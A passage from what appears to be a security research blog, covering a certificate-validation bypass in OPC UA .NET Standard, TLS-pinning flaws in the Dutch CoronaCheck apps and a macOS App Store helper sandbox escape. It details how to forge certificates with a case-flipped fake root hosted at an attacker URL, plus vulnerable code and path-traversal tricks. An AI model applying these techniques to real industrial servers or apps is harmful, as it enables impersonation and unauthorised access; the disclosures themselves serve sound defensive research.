862protectedvirtualasyncTaskInternalValidate(X509Certificate2Collectioncertificates,ConfiguredEndpointendpoint)863{864X509Certificate2certificate=certificates[0];865866// check for previously validated certificate.867X509Certificate2certificate2=null;868869if(m_validatedCertificates.TryGetValue(certificate.Thumbprint,outcertificate2))870{871if(Utils.IsEqual(certificate2.RawData,certificate.RawData))872{873return;874}875}876877CertificateIdentifiertrustedCertificate=awaitGetTrustedCertificate(certificate).ConfigureAwait(false);878879// get the issuers (checks the revocation lists if using directory stores).880List<CertificateIdentifier>issuers=newList<CertificateIdentifier>();881Dictionary<X509Certificate2,ServiceResultException>validationErrors=newDictionary<X509Certificate2,ServiceResultException>();882883boolisIssuerTrusted=awaitGetIssuersNoExceptionsOnGetIssuer(certificates,issuers,validationErrors).ConfigureAwait(false);884885ServiceResultsresult=PopulateSresultWithValidationErrors(validationErrors);886887// setup policy chain888X509ChainPolicypolicy=newX509ChainPolicy();889policy.RevocationFlag=X509RevocationFlag.EntireChain;890policy.RevocationMode=X509RevocationMode.NoCheck;891policy.VerificationFlags=X509VerificationFlags.NoFlag;892893foreach(CertificateIdentifierissuerinissuers)894{895if((issuer.ValidationOptions&CertificateValidationOptions.SuppressRevocationStatusUnknown)!=0)896{897policy.VerificationFlags|=X509VerificationFlags.IgnoreCertificateAuthorityRevocationUnknown;898policy.VerificationFlags|=X509VerificationFlags.IgnoreCtlSignerRevocationUnknown;899policy.VerificationFlags|=X509VerificationFlags.IgnoreEndRevocationUnknown;900policy.VerificationFlags|=X509VerificationFlags.IgnoreRootRevocationUnknown;901}902903// we did the revocation check in the GetIssuers call. No need here.904policy.RevocationMode=X509RevocationMode.NoCheck;905policy.ExtraStore.Add(issuer.Certificate);906}907908// build chain.909using(X509Chainchain=newX509Chain())910{911chain.ChainPolicy=policy;912chain.Build(certificate);913914// check the chain results.915CertificateIdentifiertarget=trustedCertificate;916917if(target==null)918{919target=newCertificateIdentifier(certificate);920}921922for(intii=0;ii<chain.ChainElements.Count;ii++)923{924X509ChainElementelement=chain.ChainElements[ii];925926CertificateIdentifierissuer=null;927928if(ii<issuers.Count)929{930issuer=issuers[ii];931}932933// check for chain status errors.934if(element.ChainElementStatus.Length>0)935{936foreach(X509ChainStatusstatusinelement.ChainElementStatus)937{938ServiceResultresult=CheckChainStatus(status,target,issuer,(ii!=0));939if(ServiceResult.IsBad(result))940{941sresult=newServiceResult(result,sresult);942}943}944}945946if(issuer!=null)947{948target=issuer;949}950}951}952[...]
First, on line 883, GetIssuersNoExceptionsOnGetIssuer is used to construct a certificate chain for the to be validated certificate (the out variable issuers). This function works in a loop. In each iteration, it attempts to find the issuer of the current certificate. For this it consults the following locations:
The list of trusted certificates stored on the server. If it is found in this list, the function will return true.
The list of issuer certificates stored on the server. These certificates are not explicitly trusted, but can be used to construct a chain to a trusted root.
The list of additional certificates sent by the client. Just like in TLS, it is possible to include additional certificates in the OPC UA handshake.
If an issuer is found, it becomes the current certificate and the loop will continue until the current certificate is self-signed or an issuer can not be found.
To find the issuer of a certificate, the function Match is used. This function compares the issuer name of the certificate with the subject name of each potential issuer. Additionally, the serial number or the subject key identifier must match. Note that the cryptographic signature is not yet considered at this stage, the match is therefore only based on forgeable certificate metadata.
The comparison of the names in Match is implemented in CompareDistinguishedName, but this implementation is unusual. This function decomposes the name into components and then does a case-insensitive match on each component. This is not how most implementations compare X.509 names.
Next up, on line 912 an X509Chain object is used. The intent here appears to be to verify that the chain built using GetIssuersNoExceptionsOnGetIssuer is cryptographically valid. However, because it is not configured with the root certificates used by the application, it will often result in errors. Thus, on line 938, the function CheckChainStatus is used to ignore certain types of errors. For example, an UntrustedRoot error is ignored if it occurred for the certificate at the root.
The vulnerability that we found is that there is no verification that the certificate chain built by GetIssuersNoExceptionsOnGetIssuer and the one built by X509Chain.Build are equal. By abusing the unusual name comparison it is possible to construct a certificate such that both functions will result in a different chain. By making sure that the errors in the second chain only occur where CheckChainStatus ignores them, it is possible for this certificate to get accepted by the server.
The only prerequisite for this attack is that we know the subject name of one of the trusted root certificates and either its serial number or subject key identifier. Because certificates are not secret, these values should be easy to obtain in practice. During the demonstration, we ran the attack against a server which itself has a certificate issued by a trusted root certificate. That certificate gives us the metadata we need. In practice this should work quite often.
Example
Certificates
Suppose the server is configured to trust a certificate with the following details:
Certificate:
Data:
Version: 3 (0x2)
Serial Number: 9891791597891487306 (0x8946b40ca084064a)
Signature Algorithm: sha1WithRSAEncryption
Issuer: CN=Root
Validity
Not Before: Feb 24 09:35:53 2022 GMT
Not After : Feb 24 09:35:53 2023 GMT
Subject: CN=Root
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Modulus:
[...]
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Authority Key Identifier:
DirName:/CN=Root
serial:89:46:B4:0C:A0:84:06:4A
X509v3 Basic Constraints:
CA:TRUE
X509v3 Key Usage:
Certificate Sign, CRL Sign
Signature Algorithm: sha1WithRSAEncryption
[...]
And suppose that the OPC server itself is configured with the following certificate, issued from this root:
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
35:b3:1d:0a:27:cf:e3:94:25:b1:46:b8:35:47:07:1c:3a:54:0a:e8
Signature Algorithm: sha1WithRSAEncryption
Issuer: CN=Root
Validity
Not Before: Feb 24 09:35:53 2022 GMT
Not After : Mar 26 09:35:53 2022 GMT
Subject: CN=Quickstart Reference Server, C=US, ST=Arizona, O=OPC Foundation, DC=opcserver
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Modulus:
[...]
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Authority Key Identifier:
DirName:/CN=Root
serial:89:46:B4:0C:A0:84:06:4A
X509v3 Basic Constraints:
CA:FALSE
X509v3 Key Usage:
Digital Signature, Key Encipherment, Data Encipherment, Key Agreement
X509v3 Subject Alternative Name:
DNS:opcserver, URI:URI:urn:opcserver
Signature Algorithm: sha1WithRSAEncryption
[...]
Then the attacker can connect to the server to obtain this certificate and use the data in the Issuer and X509v3 Authority Key Identifier fields to craft two new certificates.
First of all, the attacker generates a new root certificate which uses the same common name as the trusted root certificate, but where each letter is flipped in case (i.e.: upper case to lower case and lower case to upper case). This certificate is self-signed and must contain the CA=TRUE basic constraint. The attacker makes this certificate available for download as a PEM file over HTTP on a webserver at the URL http://attacker/root.pem.
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
18:c6:c2:36:a6:97:b1:a8:10:4b:07:7c:4b:20:5e:f2:d0:8b:e0:a2
Signature Algorithm: sha256WithRSAEncryption
Issuer: CN=rOOT
Validity
Not Before: Feb 17 10:40:24 2022 GMT
Not After : May 25 10:40:24 2022 GMT
Subject: CN=rOOT
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (3072 bit)
Modulus:
[...]
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Basic Constraints:
CA:TRUE
X509v3 Key Usage:
Digital Signature, Non Repudiation, Key Encipherment, Data Encipherment, Key Agreement, Certificate Sign, CRL Sign
Signature Algorithm: sha256WithRSAEncryption
[...]
Secondly, the attacker generates a new leaf certificate, signed using the previously created root. The following fields are added to this certificate:
The issuer contains the subject name of the fake root.
The X509v3 Authority Key Identifier extension contains a directory name of the fake root and a serial number of the real trusted root.
The certificate contains an Authority Information Access extension containing a CA Issuers field containing the URL where the fake root certificate PEM file can be downloaded.
All other fields, like the Subject and Subject Alternative Name fields, can contain any data the attacker may choose. To pass all further checks in InternalValidate, the validity time should contain the current time and the keyUsage field should contain Data Encipherment. A Subject Alternative Name extension could be added if the domain is checked.
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
0e:4f:b8:ff:bd:d9:3a:fe:e7:0a:b2:eb:64:32:59:5e:ad:08:01:39
Signature Algorithm: sha256WithRSAEncryption
Issuer: CN=rOOT
Validity
Not Before: Feb 17 10:40:24 2022 GMT
Not After : May 25 10:40:24 2022 GMT
Subject: CN=FakeCert
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (3072 bit)
Modulus:
[...]
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Authority Key Identifier:
DirName:/CN=rOOT
serial:89:46:B4:0C:A0:84:06:4A
X509v3 Basic Constraints:
CA:FALSE
Authority Information Access:
CA Issuers - URI:http://attacker/root.pem
X509v3 Key Usage:
Digital Signature, Non Repudiation, Key Encipherment, Data Encipherment, Key Agreement, Certificate Sign, CRL Sign
Signature Algorithm: sha256WithRSAEncryption
[...]
Verification
When the attacker connects with this CN=FakeCert certificate, the following will happen:
GetIssuersNoExceptionsOnGetIssuer will look in its trusted certificate store for the issuer of this certificate. To do this, it compares the Issuer name of the received certificate with the Subject name of the certificates in the store.
It does this check by decomposing the distinguished name, sorting the components, and then doing a case-insensitive match on each component.
So, it compares the common name of the issuer from the certificate:
CN=rOOT
with the common name of the subject of the trusted certificate:
CN=Root
In addition, it will compare the serial number of the root certificate with the serial number of the authority key identifier extension, which are equal:
Serial Number: 9891791597891487306 (0x8946b40ca084064a)
This function will therefore consider the CN=Root certificate a match. The signature could show that it is not correctly signed, but this is not checked yet. It will obtain a chain with one issuer and isIssuerTrusted will be true.
Then, it creates an X509Chain object and calls chain.Build(certificate). The result code of this call is ignored, and the global status of the result too. Only the statuses of the individual chain elements are checked.
As chain.Build does a literal comparison on the subject of the trusted root with the issuer of FakeCert, it will not consider the CN=Root certificate to be the issuer of FakeCert (because it looks for CN=rOOT). While the serial number from the Authority Key Identifier extension matches, this is not sufficient for a match.
Because it canβt find the issuer certificate in its trust store, it will use the CA Issuers URL from the Authority Information Access extension to download the certificate from the webserver. With that, the result of the chain.Build() call will be a chain of two certificates, where the second one indicates the error UntrustedRoot. The function CheckChainStatus ignores this error code because it incorrectly assumes that the corresponding certificate was one of its trusted certificates, but it will in fact be the CN=rOOT certificate.
The remainder of the checks in InternalValidate will now succeed, because issuedByCA is true and isIssuerTrusted is true. The key usage, endpoint domain, use of SHA1 and minimum key size checks can be passed because the attacker has full control over the contents of FakeCert.
Our exploit can been seen in action in the video below:
Impact
With this vulnerability we could bypass the Trusted Application Check against the reference server that is included in the OPC UA .NET Standard repository. It would also be possible to bypass the check at the client side to impersonate a server.
In addition, OPC UA also has what is known as βUser Authenticationβ, which happens after the Trusted Application Check to establish a session. One of the options for User Authentication is by using an X.509 certificate, which could be bypassed in the same way too.
In most places in practice the OPC UA server would not be exposed to the public internet, so to exploit this issue an attacker would need to already have access to an internal ICS network. However, in rare cases where exposing an OPC UA server to the public internet would be unavoidable, enabling certificate authentication would be the most effective method for securing it. In that case, this check could be bypassed and it would be possible to gain access to the communication.
Once connected to an OPC UA server, the attacker would be able to read and write data, which could be used to disrupt the ICS processes that use this server.
The fix
The issues we found were fixed in the commit 51549f5ed846c8ac060add509c76ff4c0470f24d and assigned CVE-2022-29865. Names are now compared in the same manner as other X.509 implementations, by not doing a case-insensitive check and no resorting of name components. In addition, defensive checks were added to make sure that the two certificate chains that are used are equal.
Thoughts
Certificate validation is tricky, as we have also demonstrated before in our post about the Dutch Corona-check app. These vulnerabilities actually bear some similarity, as both used a check for issuers based only on forgeable data. In this case, the cause is the desire to not use the Windows certificate store. We are unsure if this is truly the only way to implement this in .NET, as the CustomTrustStore property and TrustMode=CustomRootTrust setting on an X509ChainPolicy object appear to offer the required functionality without a dependence on the Windows certificate store.
The level of detail in the OPC UA specification regarding certificate validation is admirable. For example, it specifies clearly what errors should be used in what situations and there is even a chapter that suggests how to store the certificates on the server. However, there is a risk that over-specification of how a process like this should work leads to complex and non-idiomatic code. If the normal .NET API can no longer be applied directly as certain parts need to be re-implemented, this could create a large potential source for vulnerabilities.
Conclusion
We demonstrated a Trusted Application Check Bypass in OPC Foundation OPC UA .NET Standard. This can be used to set up a trusted connection to an OPC UA server. The cause of this vulnerability was the modification of the certificate validation procedure to use trusted roots stored in a custom location instead of the Windows certificate store and an unusual name comparison. This made it possible to made our certificate appear to be signed by one of the trusted roots.
We thank Zero Day Initiative for organizing this years edition of Pwn2Own Miami, we hope to return to a later edition!
During the pandemic a lot of software has seen an explosive growth of active users, such as the software used for working from home. In addition, completely new applications have been developed to track and handle the pandemic, like those for Bluetooth-based contact tracing. These projects have been a focus of our research recently. With projects growing this quickly or with a quick deadline for release, security is often not given the required attention. It is therefore very useful to contribute some research time to improve the security of the applications all of us suddenly depend on. Previously, we have found vulnerabilities in Zoom and Proctorio. This blog post will detail some vulnerabilities in the Dutch CoronaCheck app we found and reported. These vulnerabilities are related to the security of the connections used by the app and were difficult to exploit in practice. However, it is a little worrying to find this many vulnerabilities in an app for which security is of such critical importance.
Background
The CoronaCheck app can be used to generate a QR code proving that the user has received either a COVID-19 vaccination, has recently received a negative test result or has recovered from COVID-19. A separate app, the CoronaCheck Verifier can be used to check these QR codes. These apps are used to give access to certain locations or events, which is known in The Netherlands as βTesten voor Toegangβ. They may also be required for traveling to specific countries. The app used to generate the QR code is refered to in the codebase as the Holder app to distinguish it from the Verifier app. The source code of these apps is available on Github, although active development takes place in a separate non-public repository. At certain intervals, the public source code is updated from the private repository.
The Holder app:
The Verifier app:
The verification of the QR codes uses two different methods, depending on whether the code is for use in The Netherlands or internationally. The cryptographic process is very different for each. We spent a bit of time looking at these two processes, but found no (obvious) vulnerabilities.
Then we looked at the verification of the connections set up by the two apps. Part of the configuration of the app needs to be downloaded from a server hosted by the Ministerie van Volksgezondheid, Welzijn en Sport (VWS). This is because test results are retrieved by the app directly from the test provider. This means that the Holder app needs to know which test providers are used right now, how to connect to them and the Verifier app needs to know what keys to use to verify the signatures for that test provider. The privacy aspects of this design are quite good: the test provider only knows the user retrieved the result, but not where they are using it. VWS doesnβt know who has done a test or their results and the Verifier only sees the limited personal information in the QR which is needed to check the identity of the holder. The downside of this is that blocking a specific personβs QR code is difficult.
Strict requirements were formulated for the security of these connections in the design. See here (in Dutch). This includes the use of certificate pinning to check that the certificates are issued a small set of Certificate Authorities (CAs). In addition to the use of TLS, all responses from the APIs must be signed using a signature. This uses the PKCS#7 Cryptographic Message Syntax (CMS) format.
Many of the checks on certificates that were added in the iOS app contained subtle mistakes. Combined, only one implicit check on the certificate (performed by App Transport Security) was still effective. This meant that there was no certificate pinning at all and any malicious CA could generate a certificate capable of intercepting the connections between the app and VWS or a test provider.
Certificate check issues
An iOS app that wants to handle the checking of TLS certificates itself can do so by implementing the delegate method urlSession(_:didReceive:completionHandler:). Whenever a new connection is created, this method is called allowing the app to perform its own checks. It can respond in three different ways: continue with the usual validation (performDefaultHandling), accept the certificate (useCredential) or reject the certificate (cancelAuthenticationChallenge). This function can also be called for other authentication challenges, such as HTTP basic authentication, so it is common to check that the type is NSURLAuthenticationMethodServerTrust first.
203funccheckSSL(){204205guardchallenge.protectionSpace.authenticationMethod==NSURLAuthenticationMethodServerTrust,206letserverTrust=challenge.protectionSpace.serverTrustelse{207208logDebug("No security strategy")209completionHandler(.performDefaultHandling,nil)210return211}212213letpolicies=[SecPolicyCreateSSL(true,challenge.protectionSpace.hostasCFString)]214SecTrustSetPolicies(serverTrust,policiesasCFTypeRef)215letcertificateCount=SecTrustGetCertificateCount(serverTrust)216217varfoundValidCertificate=false218varfoundValidCommonNameEndsWithTrustedName=false219varfoundValidFullyQualifiedDomainName=false220221forindexin0..<certificateCount{222223ifletserverCertificate=SecTrustGetCertificateAtIndex(serverTrust,index){224letserverCert=Certificate(certificate:serverCertificate)225226ifletname=serverCert.commonName{227ifname.lowercased()==challenge.protectionSpace.host.lowercased(){228foundValidFullyQualifiedDomainName=true229logVerbose("Host matched CN \(name)")230}231fortrustedNameintrustedNames{232ifname.lowercased().hasSuffix(trustedName.lowercased()){233foundValidCommonNameEndsWithTrustedName=true234logVerbose("Found a valid name \(name)")235}236}237}238ifletsan=openssl.getSubjectAlternativeName(serverCert.data),!foundValidFullyQualifiedDomainName{239ifcompareSan(san,name:challenge.protectionSpace.host.lowercased()){240foundValidFullyQualifiedDomainName=true241logVerbose("Host matched SAN \(san)")242}243}244fortrustedCertificateintrustedCertificates{245246ifopenssl.compare(serverCert.data,withTrustedCertificate:trustedCertificate){247logVerbose("Found a match with a trusted Certificate")248foundValidCertificate=true249}250}251}252}253254iffoundValidCertificate&&foundValidCommonNameEndsWithTrustedName&&foundValidFullyQualifiedDomainName{255// all good256logVerbose("Certificate signature is good for \(challenge.protectionSpace.host)")257completionHandler(.useCredential,URLCredential(trust:serverTrust))258}else{259logError("Invalid server trust")260completionHandler(.cancelAuthenticationChallenge,nil)261}262}
If an app wants to implement additional verification checks, then it is common to start with performing the platformβs own certificate validation. This also means that the certificate chain is resolved. The certificates received from the server may be incomplete or contain additional certificates, by applying the platform verification a chain is constructed ending in a trusted root (if possible). An app that uses a private root could also do this, but while adding the root as the only trust anchor.
This leads to the first issue with the handling of certificate validation in the CoronaCheck app: instead of giving the βcontinue with the usual validationβ result, the app would accept the certificate if its own checks passed (line 257). This meant that the checks are not additions to the verification, but replace it completely. The app does implicitly perform the platform verification to obtain the correct chain (line 215), but the result code for the validation was not checked, so an untrusted certificate was not rejected here.
The app performs 3 additional checks on the certificate:
It is issued by one of a list of root certificates (line 246).
It contains a Subject Alternative Name containing a specific domain (line 238).
It contains a Common Name containing a specific domain (lines 227 and 232).
For checking the root certificate the resolved chain is used and each certificate is compared to a list of certificates hard-coded in the app. This set of roots depends on what type of connection it is. Connections to the test providers are a bit more lenient, while the connection to the VWS servers itself needs to be issued by a specific root.
This check had a critical issue: the comparison was not based on unforgeable data. Comparing certificates properly could be done by comparing them byte-by-byte. Certificates are not very large, this comparison would be fast enough. Another option would be to generate a hash of both certificates and compare those. This could speed up repeated checks for the same certificate. The implemented comparison of the root certificate was based on two checks: comparing the serial number and comparing the βauthority key informationβ extension fields. For trusted certificates, the serial number must be randomly generated by the CA. The authority key information field is usually a hash of the certificateβs issuerβs key, but this can be any data. It is trivial to generate a self-signed certificate with the same serial number and authority key information field as an existing certificate. Combine this with the previous item and it is possible to generate a new, self-signed certificate that is accepted by the TLS verification of the app.
This combination of issues may sound like TLS validation was completely broken, but luckily there was a safety net. In iOS 9, Apple introduced a mechanism called App Transport Security (ATS) to enforce certificate validation on connections. This is used to enforce the use of secure and trusted HTTPS connections. If an app wants to use an insecure connection (either plain HTTP or HTTPS with certificates not issued by a trusted root), it needs to specifically opt-in to that in its Info.plist file. This creates something of a safety net, making it harder to accidentally disable TLS certificate validation due to programming mistakes.
ATS was enabled for the CoronaCheck apps without any exceptions. This meant that our untrusted certificate, even though accepted by the app itself, was rejected by ATS. This meant we couldnβt completely bypass the certificate validation. This could however still be exploitable in these scenarios:
A future update for the app could add an ATS exception or an update to iOS might change the ATS rules. Adding an ATS exception is not as unrealistic as it may sound: the app contains a trusted root that is not included in the iOS trust store (βStaat der Nederlanden Private Root CA - G1β). To actually use that root would require an ATS exception.
A malicious CA could issue a certificate using the serial number and authority key information of one of the trusted certificates. This certificate would be accepted by ATS and pass all checks. A reliable CA would not issue such a certificate, but it does mean that the certificate pinning that was part of the requirements was not effective.
Other issues
We found a number of other issues in the verification of certificates. These are of lower impact.
Subject Alternative Names
In the past, the Common Name field was used to indicate for which domain a certificate was for. This was inflexible, because it meant each certificate was only valid for one domain. The Subject Alternative Name (SAN) extension was added to make it possible to add more domain names (or other types of names) to certificates. To correctly verify if a certificate is valid for a domain, the SAN extension has to be checked.
Obtaining the SANs from a certificates was implemented by using OpenSSL to generate a human-readable representation of the SAN extension and then parsing that. This did not take into account the possibility of other name types than a domain name, such as an email addresses in a certificate used for S/MIME. The parsing could be confused using specifically formatted email addresses to make it match any domain name.
114funccompareSan(_san:String,name:String)->Bool{115116letsanNames=san.split(separator:",")117forsanNameinsanNames{118// SanName can be like DNS: *.domain.nl119letpattern=String(sanName)120.replacingOccurrences(of:"DNS:",with:"",options:.caseInsensitive)121.trimmingCharacters(in:.whitespacesAndNewlines)122ifwildcardMatch(name,pattern:pattern){123returntrue124}125}126returnfalse127}
For example, an S/MIME certificate containing the email address "a,*,b"@example.com (which is a valid email address) would result in a wildcard domain (*) that matches all hosts.
CMS signatures
The domain name check for the certificate used to generate the CMS signature of the response did not compare the full domain name, instead it checked that a specific string occurred in the domain (coronacheck.nl) and that it ends with a specific string (.nl). This means that an attacker with a certificate for coronacheck.nl.example.nl could also CMS sign API responses.
259-(BOOL)validateCommonNameForCertificate:(X509*)certificate260requiredContent:(NSString*)requiredContent261requiredSuffix:(NSString*)requiredSuffix{262263// Get subject from certificate
264X509_NAME*certificateSubjectName=X509_get_subject_name(certificate);265266// Get Common Name from certificate subject
267charcertificateCommonName[256];268X509_NAME_get_text_by_NID(certificateSubjectName,NID_commonName,certificateCommonName,256);269NSString*cnString=[NSStringstringWithUTF8String:certificateCommonName];270271// Compare Common Name to required content and required suffix
272BOOLcontainsRequiredContent=[cnStringrangeOfString:requiredContentoptions:NSCaseInsensitiveSearch].location!=NSNotFound;273BOOLhasCorrectSuffix=[cnStringhasSuffix:requiredSuffix];274275certificateSubjectName=NULL;276277returnhasCorrectSuffix&&containsRequiredContent;278}
The only issue we found on the Android implementation is similar: the check for the CMS signature used a regex to check the name of the signing certificate. This regex was not bound on the right, making also possible to bypass it using coronacheck.nl.example.com.
if(cnMatchingRegex!=null){if(!JcaX509CertificateHolder(signingCertificate).subject.getRDNs(BCStyle.CN).any{valcn=IETFUtils.valueToString(it.first.value)cnMatchingRegex.containsMatchIn(cn)}){throwSignatureValidationException("Signing certificate does not match expected CN")}}
Because these certificates had to be issued by PKI-Overheid (a CA run by the Dutch government) certificate, it might not have been easy to obtain a certificate with such a domain name.
Race condition
We also found a race condition in the application of the certificate validation rules. As we mentioned, the rules the app applied for certificate validation were more strict for VWS connections than for connections to test providers, and even for connections to VWS there were different levels of strictness. However, if two requests were performed quickly after another, the first request could be validated based on the verification rules specified for the second request. In practice, the least strict verification rules still require a valid certificate, so this can not be used to intercept connections either. However, it was already triggering in normal use, as the app was initiating two requests with different validation rules immediately after starting.
Reporting
We reported these vulnerabilities to the email address on the βKwetsbaarheid meldenβ (Report a vulnerability) page on June 30th, 2021. This email bounced because the address did not exist. We had to reach out through other channels to find a working address. We received an acknowledgement that the message was received, but no further updates. The vulnerabilities were fixed quietly, without letting us know that they were fixed.
In October we decided to look at the code on GitHub to check if all issues were resolved correctly. While most issues were fixed, one was not fixed properly. We sent another email detailing this issue. This was again fixed without informing us.
Developers are of course not required to keep us in the loop of the if we report a vulnerability, but this does show that if they had, we could have caught the incorrect fix much earlier.
Recommendation
TLS certificate validation is a complex process. This case demonstrates that adding more checks is not always better, because they might interfere with the normal platform certificate validation. We recommend changing the certificate validation process only if absolutely necessary. Any extra checks should have a clear security goal. Checks such as βthe domain must contain the string β¦β (instead of βmust end with β¦β) have no security benefit and should be avoided.
Certificate pinning not only has implementation challenges, but also operational challenges. If a certificate renewal has not been properly planned, then it may leave an app unable to connect. This is why we usually recommend pinning only for applications handling very sensitive user data. Other checks can be implemented to address the risk of a malicious or compromised CA with much less chance of problems, for example checking the revocation and Certificate Transparency status of a certificate.
Conclusion
We found and reported a number of issues in the verification of TLS certificates used for the connections of the Dutch CoronaCheck apps. These vulnerabilities could have been combined to bypass certificate pinning in the app. In most cases, this could only be abused by a compromised or malicious CA or if a specific CA could be used to issue a certificate for a certain domain. These vulnerabilities have since then been fixed.
CVE-2021-30688 is a vulnerability which was fixed in macOS 11.4 that allowed a malicious application to escape the Mac Application Sandbox and to escalate its privileges to root. This vulnerability required a strange exploitation path due to the sandbox profile of the affected service.
Background
At rC3 in 2020 and HITB Amsterdam 2021 Daan Keuper and Thijs Alkemade gave a talk on macOS local security. One of the subjects of this talk was the use of privileged helper tools and the vulnerabilities commonly found in them. To summarize, many applications install a privileged helper tool in order to install updates for the application. This allows normal (non-admin) users to install updates, which is normally not allowed due to the permissions on /Applications. A privileged helper tool is a service which runs as root which used for only a specific task that needs root privileges. In this case, this could be installing a package file.
Many applications that use such a tool contain two vulnerabilities that in combination lead to privilege escalation:
Not verifying if a request to install a package comes from the main application.
Not correctly verifying the authenticity of an update package.
As it turns out, the first issue not only affects third-party developers, but even Apple itself! Although in a slightly different wayβ¦
About StorePrivilegedTaskService
StorePrivilegedTaskService is a tool used by the Mac App Store to perform certain privileged operations, such as removing the quarantine flag of downloaded files, moving files and adding App Store receipts. It is an XPC service embedded in the AppStoreDaemon.framework private framework.
To explain this vulnerability, it would be best to first explain XPC services and Mach services, and the difference between those two.
First of all, XPC is an inter-process communication technology developed by Apple which is used extensively to communicate between different processes in all of Appleβs operating systems. In iOS, XPC is a private API, usable only indirectly by APIs that need to communicate with other processes. On macOS, developers can use it directly. One of the main benefits of XPC is that it sends structured data, supporting many data types such as integers, strings, dictionaries and arrays. This can in many cases avoid the use of serialization functions, which reduces the possibility of vulnerabilities due to parser bugs.
XPC services
An XPC service is a lightweight process related to another application. These are launched automatically when an application initiates an XPC connection and terminated after they are no longer used. Communication with the main process happens (of course) over XPC. The main benefit of using XPC services is the ability to separate dangerous operations or privileges, because the XPC service can have different entitlements.
For example, suppose an application needs network functionality for only one feature: to download a fixed URL. This means that when sandboxing the application, it would need full network client access (i.e. the com.apple.security.network.client entitlement). A vulnerability in this application can then also use the network access to send out arbitrary network traffic. If the functionality for performing the request would be moved to a different XPC service, then only this service would need the network permission. Compromising the main application would only allow it to retrieve that URL and compromising the XPC service would be unlikely, as it requires very little code. This pattern is how Apple uses these services throughout the system.
These services can have one of 3 possible service types:
Application: each application initiating a connection to an XPC service spawns a new process (though multiple connections from one application are still handled in the same process).
User: per user only one instance of an XPC service is running, handling requests from all applications running as that user.
System: only one instance of the XPC service is running and it runs as root. Only available for Appleβs own XPC services.
Mach services
While XPC services are local to an application, Mach services are accessible for XPC connections system wide by registering a name. A common way to register this name is through a launch agent or launch daemon config file. This can launch the process on demand, but the process is not terminated automatically when no longer in use, like XPC services are.
NSXPCConnection is a higher-level Objective-C API for XPC connections. When using it, an object with a list of methods can be made available to the other end of the connection. The connecting client can call these methods just like it would call any normal Objective-C methods. All serialization of objects as arguments is handled automatically.
Permissions
XPC services in third-party applications rarely have interesting permissions to steal compared to a non-sandboxed application. Sanboxed services can have entitlements that create sandbox exceptions, for example to allow the service to access the network. Compared to a non-sandboxed application, these entitlements are not interesting to steal because the app is not sandboxed. TCC permissions are also usually set for the main application, not its XPC services (as that would generate rather confusing prompts for the end user).
A non-sandboxed application can therefore almost never gain anything by connecting to the XPC service of another application. The template for creating a new XPC service in Xcode does not even include a check on which application has connected!
This does, however, appear to give developers a false sense of security because they often do not add a permission check to Mach services either. This leads to the privileged helper tool vulnerabilities discussed in our talk. For Mach services running as root, a check on which application has connected is very important. Otherwise, any application could connect to the Mach service to request it to perform its operations.
StorePrivilegedTaskService vulnerability
Sandbox escape
The main vulnerability in the StorePrivilegedTaskService XPC service was that it did not check the application initiating the connection. This service has a service type of System, so it would launch as root.
This vulnerability was exploitable due to defense-in-depth measures which were ineffective:
StorePrivilegedTaskService is sandboxed, but its custom sandboxing profile is not restrictive enough.
For some operations, the service checked the paths passed as arguments to ensure they are a subdirectory of a specific directory. These checks could be bypassed using path traversal.
This XPC service is embedded in a framework. This means that even a sandboxed application could connect to the XPC service, by loading the framework and then connecting to the service.
The XPC service offers a number of interesting methods that can be called from the application using an NSXPCConnection. For example:
// Write a file
-(void)writeAssetPackMetadata:(NSData*)metadatatoURL:(NSURL*)urlwithReplyHandler:(void(^)(NSError*))replyHandler;// Delete an item
-(void)removePlaceholderAtPath:(NSString*)pathwithReplyHandler:(void(^)(NSError*))replyHandler;// Change extended attributes for a path
-(void)setExtendedAttributeAtPath:(NSString*)pathname:(NSString*)namevalue:(NSData*)valuewithReplyHandler:(void(^)(NSError*))replyHandler;// Move an item
-(void)moveAssetPackAtPath:(NSString*)pathtoPath:(NSString*)toPathwithReplyHandler:(void(^)(NSError*))replyHandler;
A sandbox escape was quite clear: write a new application bundle, use the method -setExtendedAttributeAtPath:name:value:withReplyHandler: to remove its quarantine flag and then launch it. However, this also needs to take into account the sandbox profile of the XPC service.
The service has a custom profile. The restriction related to files and folders are:
The intent of these rules is that this service can modify specific files in applications currently downloading from the app store, so with a .appdownload extension. For example, adding a MASReceipt file and changing the icon.
The regexes here are the most interesting, mainly because they are attached neither on the left nor right. On the left this makes sense, as the full path could be unknown, but the lack of binding it on the right (with $) is a mistake for the file regexes.
Formulated simply, we can do the following with this sandboxing profile:
All operations are allowed on directories containing .app anywhere in their path.
All operations are allowed on files containing .appdownload/Icon anywhere in their path.
By creating a specific directory structure in the temporary files directory of our sandboxed application:
bar.appdownload/Icon/
Both the sandboxed application and the StorePrivilegedTaskService have full access inside the Icon folder. Therefore, it would be possible to create a new application here and then use -setExtendedAttributeAtPath:name:value:withReplyHandler: on the executable to dequarantine it.
Privesc
This was already a nice vulnerability, but we were convinced we could escalate privileges to root as well. Having a process running as root creating new files in chosen directories with specific contents is such a powerful primitive that privilege escalation should be possible. However, the sandbox requirements on the paths made this difficult.
Creating a new launch daemon or cron jobs are common ways for privilege escalation by file creation, but the sandbox profile path requirements would only allow a subdirectory of a subdirectory of the directories for these config files, so this did not work.
An option that would work would be to modify an application. In particular, we found that Microsoft Teams would work. Teams is one of the applications that installs a launch daemon for installing updates. However, instead of copying a binary to /Library/PrivilegedHelperTools, the daemon points into the application bundle itself:
